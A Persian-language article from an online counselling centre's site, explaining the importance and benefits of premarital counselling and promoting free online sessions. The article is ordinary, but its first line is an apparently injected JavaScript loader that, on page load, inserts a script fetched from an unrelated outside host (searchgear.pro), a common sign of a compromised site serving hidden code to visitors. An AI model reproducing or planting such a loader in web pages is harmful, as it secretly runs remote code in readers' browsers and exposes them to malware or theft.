;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); چرا مشاوره پیش از ازدواج مهم است؟
اهمیت مشاوره پیش از ازدواج

اهمیت مشاوره پیش از ازدواج

میزان پیشرفت خواندن شما

فهرست مطالب

در این مطلب قصد داریم به طور کامل به موضوع اهمیت مشاوره پیش از ازدواج بپردازیم. اگر شما هم جزو افرادی هستید که به زودی قرار است برای ازدواج اقدام کنید، این مطلب را از دست ندهید. ازدواج یکی از مهمترین تصمیمات در زندگی هر فردی محسوب می شود. انتخاب شریک زندگی اگر به درستی انجام شود ضمانتی برای آسایش و راحتی شما تا آخر عمر می باشد. در طرف مقابل اما اگر این انتخاب به درستی انجام نشود، ممکن است سرنوشت شما را تغییر داده و همیشه با مشکلات ناشی از این انتخاب مواجه باشید.

توضیحاتی در مورد اهمیت مشاوره پیش از ازدواج

بسیاری از جوانان وقتی در مورد اهمیت مشاوره پیش از ازدواج با آنان صحبت می شود گمان می کنند قصد ترساندن آنها را داریم. البته با گذشت زمان و بعد از وارد شدن به زندگی مشترک متوجه می شوند که واقعیت این چنین نبوده و مشاوره قبل از ازدواج فواید زیادی می تواند داشته باشد. شما نیز اگر قصد دارید بهترین انتخاب ممکن را داشته باشید، بهتر است مشاوره قبل از ازدواج را جدی بگیرید تا بتوانید انتخابی ایده آل داشته باشید.

اغلب افراد از اهمیت مشاوره پیش از ازدواج غافل هستند و این گونه فکر می کنند که ازدواج مثل هندوانه دربسته می باشد. این افراد معتقد هستند که به هیچ وجه نمی توان قبل از ازدواج متوجه شد که انتخاب انجام شده درست است یا اشتباه. این تصور کاملا اشتباه می باشد و چنین مقایسه ای جز اینکه ممکن است افراد را وارد یک زندگی پر دردسر بکند حاصل دیگری نخواهد داشت. حتی موقع انتخاب هندوانه دربسته هم اگر از یک فرد متخصص بخواهید هندوانه ای برای شما انتخاب کند احتمال اینکه هندوانه کیفیت نداشته باشد بسیار کمتر می شود. بدین ترتیب بهتر است برای ازدواج هم سراغ مشاوران که افراد باتجربه ای هستند بروید.

چرا مشاوره قبل از ازدواج مهم است؟

سوالی که برای اغلب شما ممکن است به وجود آید این است که چرا مشاوره پیش از ازدواج مهم است؟ اگر بخواهید با اهمیت مشاوره قبل از ازدواج آشنا شوید بهتر است سری به دادگاه خانواده بزنید و آمار طلاق به خصوص در سال های ابتدایی ازدواج را مشاهده کنید. زوج های بسیار زیادی در سال های اول زندگی مشترک به خاطر مشکلات ریز و درشت راهی دادگاه خانواده می شوند. این افراد اغلب بر این باورند که شناختشان از شریک زندگی شان کم بوده و همین موضوع باعث شده تا با مشکل مواجه شوند.

مشاوره قبل از ازدواج در واقع کمک می کند تا شناخت افراد نسبت به هم بیشتر شود. این افزایش شناخت و آگاهی نسبت به همدیگر باعث می شود تا اگر افراد احساس می کنند که با هم سازگاری ندارند، اصلا ازدواجی صورت نگیرد. بدین ترتیب دادگاه های خانواده هم خلوت تر می شوند و آمار طلاق نیز خود به خود شیب نزولی خواهد گرفت.

اگر بخواهیم کمی منطقی فکر کنیم مشاوره قبل از ازدواج را می توان پیشگیری و مراجعه به دادگاه خانواده بعد از ازدواج را می توان درمان در نظر گرفت. چیزی که همیشه بین همه اقشار مرسوم بوده هم این است که پیشگیری بهتر از درمان است. حالا شاید بهتر از قبل با اهمیت مشاوره پیش از ازدواج آشنا شده باشید. مشاوره قبل از ازدواج با صرف کمترین میزان وقت و هزینه قابل انجام است. بار روانی و عصبی خاصی هم برای افراد به دنبال ندارد. در طرف مقابل مراجعه به دادگاه خانواده و پیگیری مشکلات خانوادگی با چه مشکلاتی همراه است. توجه داشته باشید که باید وقت زیادی برای آن صرف کنید و هزینه های زیادی نیز پرداخت نمایید. نتیجه به دست آمده از مشاوره قبل ازدواج قابل مقایسه با نتیجه ای که از دادگاه های خانواده به دست می آید، نمی باشد.

  دلبستگی

مهمترین دلایل برای انجام مشاوره پیش از ازدواج

اهمیت مشاوره پیش از ازدواج باعث شده تا اغلب افراد قبل از ازدواج جلسات مشاوره را پشت سر بگذارند. یکی از مهمترین دلایل برای انجام مشاوره قبل از ازدواج یادآوری اهمیت ازدواج می باشد. ازدواج مختص به یک یا چند روز نیست و یک امر همیشگی است. انجام تحقیقات زیاد و مشاوره با افراد متخصص می تواند به موفقیت آمیز بودن ازدواج کمک کند. فقط ازدواج کردن نباید ملاک باشد بلکه باید هدف این باشد که ازدواج موفقیت آمیزی داشته باشید.

شناخت انتظارات و توقعات یکی دیگر از دلایل مهم برای انجام مشاوره قبل از ازدواج می باشد. اینکه هر فردی بداند چه انتظاراتی را می تواند از شریک زندگی خود داشته باشد و چه انتظاراتی خارج از عرف است از اهمیت بسیار زیادی برخوردار می باشد. وقتی همه این موارد به طور شفاف بررسی شوند افراد با آگاهی بیشتری وارد زندگی مشترک می شوند. این روش کمک می کند تا زندگی مشترک دوام بیشتری داشته باشد.

روحیات و ویژگی های شخصیتی هر فردی با فرد دیگر متفاوت می باشد. شناخت این تفاوت ها کمک می کند تا افراد بتوانند راحت تر با همسر خود زندگی کنند. این که بدانید طرف مقابلتان از چه رفتاری خوشش می اید و با چه رفتارهایی مشکل دارد، می تواند مسیر زندگی را برای شما هموار کند. یکی دیگر از دلایل مراجعه به مشاور قبل از ازدواج ابراز ناگفته ها می باشد. مسائل ریز و درشت بسیار زیادی وجود دارند که ممکن است باعث ایجاد کدورت بین افراد یا خانواده آنها شوند. با بررسی این مسائل می توانید از به وجود آمدن این کدورت ها تا حد زیادی جلوگیری کنید. این موضوع باعث می شود تا بعد از ازدواج مشکلات کمتری برای شما به وجود آید و نیاز به مراجعات مکرر به مشاور خانواده نداشته باشید.

مزایای مشاوره پیش از ازدواج

بعد از آشنایی با اهمیت مشاوره پیش از ازدواج بهتر است با مزایای مشاوره پیش از ازدواج هم آشنا بشوید. در این صورت متوجه خواهید شد که مشاوره قبل از ازدواج چه مزایایی را برای شما به همراه دارد. یکی از مزایای مشاوره پیش از ازدواج این است که افراد می آموزند که چگونه ارتباط سازنده با هم داشته باشند. سازنده بودن ارتباط افراد با هم کمک می کند تا تنش کمتری بین آنها ایجاد شود. کاهش تنش کمک می کند تا اختلافات کمتری هم بین زوجین به وجود آید.

یکی دیگر از مزایای مشاوره قبل از ازدواج این است که به افراد نحوه تصمیم گیری را آموزش می دهد. دوری از هیجانات در هنگام تصمیم گیری یکی از نکات طلایی به شمار می رود که افراد باید توجه ویژه ای به آن داشته باشند. مزیت بعدی مشاوره پیش از ازدواج نپرداختن به نقاط ضعف همدیگر می باشد. هیچ فردی را نمی توان یافت که نقاط ضعفی نداشته باشد. بهترین کار این است که همیشه نیمه پر لیوان را نگاه کنید و به نقاط قوت همدیگر توجه داشته باشید.

یکی دیگر از مزایای مشاوره قبل از ازدواج آموزش های لازم برای حل و فصل مشکلات روزمره می باشد. هیچ زندگی مشترکی را نمی توان یافت که با مشکلات ریز و درشتی همراه نباشد. افرادی می توانند زندگی موفقی داشته باشند که با استفاده از تکنیک های مناسب این مشکلات روزمره را برطرف کنند. آموزش مهارت برنامه ریزی برای آینده یکی دیگر از مزایای مشاوره قبل از ازدواج به شمار می رود. افرادی که زندگی بی هدفی را شروع می‌کنند قطعا با مشکلات بیشتری نسبت به سایر افراد مواجه می‌شوند. با کمک مشاوره قبل از ازدواج می توان اهداف مناسبی را برای زندگی خود تعیین کرد. تلاش برای رسیدن به این اهداف یکی از جذابیت های زندگی به شمار می رود.

  عشق چیست؟

چه کنیم تا مشاوره قبل از ازدواج موفقیت آمیز باشد؟

در ادامه آشنایی با اهمیت مشاوره پیش از ازدواج به این موضوع رسیدیم که چه کنیم تا مشاوره قبل از ازدواج موفقیت آمیز باشد؟ قبل از هر چیز باید بدانید که جلسات مشاوره پیش از ازدواج ممکن است چالش هایی را به همراه داشته باشند. مهم است که شما آمادگی لازم را داشته باشید و بابت وجود چالش های مختلف نگران و عصبی نشوید. مورد بعدی که باید به آن اشاره کنیم این است باید در جلسات مشاوره قبل از ازدواج صادق باشید. نداشتن صداقت باعث می شود تا نتوانید نتیجه لازم را از این جلسات دریافت کنید. نداشتن صداقت ممکن است علت بروز بسیاری از اختلافات در آینده باشد.

موضوع مهم دیگری که در جلسات مشاوره قبل از ازدواج باید به آن توجه داشته باشید، رازداری است. موضوعاتی که در این جلسات بیان می شوند را نباید با هیچ یک از اعضای خانواده و یا دوستان نزدیک مطرح کنید. هر گونه درز اطلاعات از این جلسات ممکن است زمینه ساز عدم اعتماد طرف مقابل به شما بشود. این موضوع ممکن است علت اصلی بسیاری از اختلافات در زندگی زناشویی باشد.

کلام پایانی

در این مطلب سعی کردیم شما را با اهمیت مشاوره پیش از ازدواج و همچنین مزایای آن آشنا کنیم. مشاوره پیش  از ازدواج یکی از مراحل مهم برای ورود به زندگی مشترک می باشد. انتخاب مشاور از اهمیت بسیار زیادی برخوردار است. داشتن تجربه و تخصص از مهمترین ویژگی های بهترین مشاوران به شمار می روند. علاوه بر مشاوره حضوری می توان از مشاوره آنلاین نیز استفاده کرد. مشاوره فردی، مشاوره قبل از ازدواج و… از جمله مواردی به شمار می روند که می توان به صورت آنلاین آنها را انجام داد.

Rate this post

توجه داشته باشید که این مطلب، جایگزین نظرات و توصیه‌های تخصصی پزشکان نیست و هرگز از این مطلب به‌عنوان جایگزین توصیه پزشکان استفاده نکنید.

جهت جلب رضايت و اعتماد شما دوست عزيز و اثبات تخصص و دانش و به جهت تصميم گيري صحيح شما در انتخاب مشاور خود، ميتوانيد يك تا دو جلسه مشاوره آنلاين رايگان از ما دريافت كنيد، كافيست روي دكمه درخواست مشاوره رايگان در همين صفحه كليك نماييد.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

مرکز مشاوره آنلاین روان‌یاری

جهت رزرو یک جلسه مشاوره رایگان فرم زیر را تکمیل بفرمایید.